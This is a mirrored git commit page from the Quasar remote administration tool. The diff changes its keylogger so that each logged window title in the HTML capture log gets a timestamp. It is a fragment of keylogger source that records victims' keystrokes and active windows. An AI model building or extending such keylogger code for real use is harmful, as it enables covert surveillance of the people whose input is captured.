mirror of https://github.com/quasar/Quasar.git
Merge pull request #196 from d3agle/master
[Keylogger] Add time to Window Title #195
This commit is contained in:
commit
96f0d1c2ef
|
@ -97,7 +97,10 @@ private void Unsubscribe()
|
|||
if (!string.IsNullOrEmpty(activeWindowTitle) && activeWindowTitle != _lastWindowTitle)
|
||||
{
|
||||
_lastWindowTitle = activeWindowTitle;
|
||||
_logFileBuffer.Append(@"<p class=""h""><br><br>[<b>" + activeWindowTitle + "</b>]</p><br>");
|
||||
_logFileBuffer.Append(@"<p class=""h""><br><br>[<b>"
|
||||
+ activeWindowTitle + " - "
|
||||
+ DateTime.Now.ToString("HH:mm")
|
||||
+ "</b>]</p><br>");
|
||||
}
|
||||
|
||||
if (_pressedKeys.IsModifierKeysSet())
|
||||
|
|
Loading…
Reference in New Issue